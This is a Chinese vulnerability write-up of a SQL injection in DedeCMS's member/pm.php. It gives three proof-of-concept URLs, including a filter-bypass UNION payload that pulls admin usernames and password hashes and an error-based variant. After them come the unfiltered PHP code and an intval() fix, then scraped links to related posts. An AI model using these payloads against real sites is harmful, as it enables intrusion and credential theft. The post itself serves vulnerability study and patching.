catalog

1. 漏洞描述2. 漏洞触发条件3. 漏洞影响范围4. 漏洞代码分析5. 防御方法6. 攻防思考

1. 漏洞描述

Dedecms会员中心注入漏洞

Relevant Link

http://www.05112.com/anquan/ldfb/sql/2014/0209/7723.html

2. 漏洞触发条件

0x1: POC1

http://127.0.0.1/dedecms5.5/member/pm.php?dopost=read&id=1‘ and char(@`‘`) and 1=2+UniOn+SelEct 1,2,3,4,5,6,7,8,9,10,11,12%20%23

0x2: POC2

如果报错: Safe Alert: Request Error step 1 !

http://127.0.0.1/dedecms5.5/member/pm.php?dopost=read&id=1′and char(@`’`) and 1=2+/*!50000Union*/+/*!50000select*/+1,2,3,4,5,6,userid,8,9,10,11,pwd+from+`%23@__admin`%23

0x3: POC3

报错注入

http://127.0.0.1/dedecms5.5/member/pm.php?dopost=read&id=1′ and @‘ and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a) and ‘1‘=‘1

Relevant Link

http://www.myhack58.com/Article/html/3/62/2014/42255.htm

3. 漏洞影响范围

4. 漏洞代码分析

/member/pm.php

else if($dopost==‘read‘)

{

$sql= "SELECT * FROM `#@__member_friends` WHERE mid=‘{$cfg_ml->M_ID}‘ AND ftype!=‘-1‘ ORDER BY addtime DESC LIMIT 20";

$friends=array();

$dsql->SetQuery($sql);

$dsql->Execute();while ($row = $dsql->GetArray())

{

$friends[]=$row;

}//$id注入

$row = $dsql->GetOne("SELECT * FROM `#@__member_pms` WHERE id=‘$id‘ AND (fromid=‘{$cfg_ml->M_ID}‘ OR toid=‘{$cfg_ml->M_ID}‘)");//ID没过滤

if(!is_array($row))

{

ShowMsg(‘对不起,你指定的消息不存在或你没权限查看!‘,‘-1‘);

exit();

}//$id注入

$dsql->ExecuteNoneQuery("UPDATE `#@__member_pms` SET hasview=1 WHERE id=‘$id‘ AND folder=‘inbox‘ AND toid=‘{$cfg_ml->M_ID}‘");

$dsql->ExecuteNoneQuery("UPDATE `#@__member_pms` SET hasview=1 WHERE folder=‘outbox‘ AND toid=‘{$cfg_ml->M_ID}‘");

include_once(dirname(__FILE__).‘/templets/pm-read.htm‘);

exit();

}

Relevant Link

http://0day5.com/archives/1313

5. 防御方法

/member/pm.php

else if($dopost==‘read‘)

{

$sql= "Select * From `#@__member_friends` where mid=‘{$cfg_ml->M_ID}‘ And ftype!=‘-1‘ order by addtime desc limit 20";

$friends=array();

$dsql->SetQuery($sql);

$dsql->Execute();while ($row = $dsql->GetArray())

{

$friends[]=$row;

}/*$id过滤*/$id=intval($id);/* */$row= $dsql->GetOne("Select * From `#@__member_pms` where id=‘$id‘ And (fromid=‘{$cfg_ml->M_ID}‘ Or toid=‘{$cfg_ml->M_ID}‘)");if(!is_array($row))

{

ShowMsg(‘对不起,你指定的消息不存在或你没权限查看!‘,‘-1‘);

exit();

}

$dsql->ExecuteNoneQuery("Update `#@__member_pms` set hasview=1 where id=‘$id‘ And folder=‘inbox‘ And toid=‘{$cfg_ml->M_ID}‘");

$dsql->ExecuteNoneQuery("Update `#@__member_pms` set hasview=1 where folder=‘outbox‘ And toid=‘{$cfg_ml->M_ID}‘");

include_once(dirname(__FILE__).‘/templets/pm-read.htm‘);

exit();

}

6. 攻防思考

Copyright (c) 2015 LittleHann All rights reserved

原文:http://www.cnblogs.com/LittleHann/p/4519096.html

dedecms pm.php,dedecms /member/pm.php SQL Injection Vul相关推荐

  1. dedecms /member/reg_new.php SQL Injection Vul

    catalog 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考 1. 漏洞描述 Dedecms会员中心注入漏洞 2. 漏洞触发条件 http ...

  2. dedecms /plus/feedback.php SQL Injection Vul

    catalog 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考 1. 漏洞描述 1. Dedecms v5.7的plus\feedback. ...

  3. ecshop /pick_out.php SQL Injection Vul By Local Variable Overriding

    catalog 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考 1. 漏洞描述 在进行输入变量本地模拟注册的时候,没有进行有效的GPC模拟过 ...

  4. dedecms \plus\guestbook.php SQL Injection Vul By \plus\guestbook\edit.inc.php

    catalog 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考 1. 漏洞描述 注射漏洞成功需要条件如下 1. php magic_quot ...

  5. ecshop /api/client/api.php、/api/client/includes/lib_api.php SQL Injection Vul

    catalog 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考 1. 漏洞描述 ECShop存在一个盲注漏洞,问题存在于/api/clien ...

  6. phpcms /api/phpsso.php SQL Injection Vul

    catalogue 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考 1. 漏洞描述 Relevant Link: 2. 漏洞触发条件 3. ...

  7. member pm.php,Dedecms 会员中心注入漏洞5

    漏洞作者: Matt [php]member/pm.php else if($dopost=='read') { $sql = "SELECT * FROM `#@__member_frie ...

  8. SAP PM 初级系列13 - PM Revision

    SAP PM 初级系列13 - PM Revision SAP PM模块的Revision用于将维修通知或者维修工单分组,在维修的时候执行相关的工作. PM Revision一般在工厂shutdown ...

  9. SAP PM 初级系列8 - PM 组织架构

    SAP PM 初级系列8 - PM 组织架构 1,SAP PM模块的典型组织架构如下示: 2,SAP PM organizational structure includes the followin ...

  10. SAP PM 入门系列14 – PM模块与其它模块的集成

    SAP PM 入门系列14 – PM模块与其它模块的集成 SAP PM与其他模块(如物料管理,生产计划,人事管理以及销售和分销)都有高度紧密的集成.以下是使用Plant Maintenance进行集成 ...

最新文章

  1. Pandas把dataframe的索引、复合索引变换为数据列:包含单索引到单列(重命名)、复合索引到多数据列、复合索引的其中一个水平变换为数据列、
  2. Java 避免精度丢失之BigDecimal 运算
  3. 每天数十亿次请求的应用经验分享,值得参考!
  4. 记一次重构:Android实践从MVC架构到MVP架构
  5. php和apache配置 LoadModule php5_module D:/php/php5apache2.dll
  6. Python爬虫之起点中文网完本小说
  7. 淘宝618超级喵运会怎么玩 如何获取喵币?
  8. 使用JavaScript实现省市县三级联动
  9. matlab运行很多columns,columns函数的使用方法
  10. 服务器安装win7系统不停重启,win7系统下路由器总是每天都自动重启如何解决
  11. Java锁深入理解5——共享锁
  12. 职场中干好工作的18准则
  13. SVM算法(三层境界)
  14. 题库小程序盈利点分析
  15. 微软新专利暗示:多功能Surface Pen触控笔可能问世
  16. bash alias命令03
  17. 3GPP TS 23501-g51 中英文对照 | 5.2.2 Network selection
  18. vue给元素添加指令_Vue指令动态模糊元素
  19. 俏兔子大战傻贼鹰(刚开始接触是写的,一直在草稿箱)
  20. join()方法的作用

热门文章

  1. [项目管理-2]:软硬件项目管理 - 干系人管理、实践活动、常见工具
  2. Python excel数据处理之公式---openpyxl
  3. Kubernetes 学习总结(24)—— Kubernetes 滚动更新、蓝绿发布、金丝雀发布等发布策略详解
  4. 拉里 埃里森_拉里·沃尔(Larry Wall)的“程序员的三个美德”是胡说八道
  5. 作为一名优秀的程序员,如何选购适合自己的显示器
  6. itext生成pdf间距_[itext]Java生成PDF文件
  7. swift语言实战晋级-第9章 游戏实战-跑酷熊猫-9-10 移除平台与视差滚动
  8. 中序和后序构建二叉树
  9. 如何查看网站被搜索引擎收录的情况
  10. 【调剂】关于开通上海第二工业大学2022年硕士研究生招生预调剂系统的通知